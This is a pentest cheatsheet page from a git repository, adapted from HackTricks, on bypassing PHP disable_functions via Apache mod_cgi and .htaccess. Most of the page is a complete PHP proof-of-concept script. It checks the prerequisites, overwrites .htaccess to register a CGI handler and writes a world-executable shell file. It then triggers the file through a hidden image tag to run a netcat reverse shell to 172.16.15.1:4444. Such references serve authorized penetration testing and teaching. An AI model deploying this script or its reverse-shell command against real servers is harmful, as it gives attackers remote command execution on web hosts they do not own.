daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

disable-functions-bypass-mod-cgi.md (2792B)


      1 ---
      2 title: "modcgi"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # mod_cgi
     14 
     15 When Apache enables `mod_cgi` alongside PHP, an attacker who can write both `.htaccess` and a file in a web-accessible directory may register a new CGI extension and execute that file outside the PHP interpreter. The following proof of concept checks those prerequisites, writes the handler configuration, and invokes a shell script.<sup>[[1]](#references)</sup>
     16 
     17 ```php
     18 <?php
     19 // Requires mod_cgi, a writable directory, and .htaccess overrides.
     20 $cmd = "nc -c '/bin/bash' 172.16.15.1 4444"; // Command to execute.
     21 $shellfile = "#!/bin/bash\n";
     22 $shellfile .= "echo -ne \"Content-Type: text/html\\n\\n\"\n"; // CGI response header.
     23 $shellfile .= "$cmd";
     24 function checkEnabled($text, $condition, $yes, $no)
     25 {
     26 	echo "$text: " . ($condition ? $yes : $no) . "<br>\n";
     27 }
     28 if (!isset($_GET['checked']))
     29 {
     30 	@file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); // Test whether .htaccess is honored.
     31 	header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); // Run the check again.
     32 }
     33 else
     34 {
     35 	$modcgi = in_array('mod_cgi', apache_get_modules());
     36 	$writable = is_writable('.');
     37 	$htaccess = !empty($_SERVER['HTACCESS']);
     38 		checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No");
     39 		checkEnabled("Is writable",$writable,"Yes","No");
     40 		checkEnabled("htaccess working",$htaccess,"Yes","No");
     41 	if(!($modcgi && $writable && $htaccess))
     42 	{
     43 		echo "Error. All of the above must be true for the script to work!";
     44 	}
     45 	else
     46 	{
     47 		checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Succeeded! Saved in .htaccess.bak","Failed!");
     48 		checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGI\nAddHandler cgi-script .dizzle"),"Succeeded!","Failed!");
     49 		checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!");
     50 		checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!");
     51 		echo "Executing the script now. Check your listener <img src = 'shell.dizzle' style = 'display:none;'>";
     52 	}
     53 }
     54 ?>
     55 ```
     56 
     57 ## References
     58 
     59 - [1] [asdizzle/php-disable_functions-bypass: `mod_cgi` and `.htaccess` proof of concept](https://github.com/asdizzle/php-disable_functions-bypass)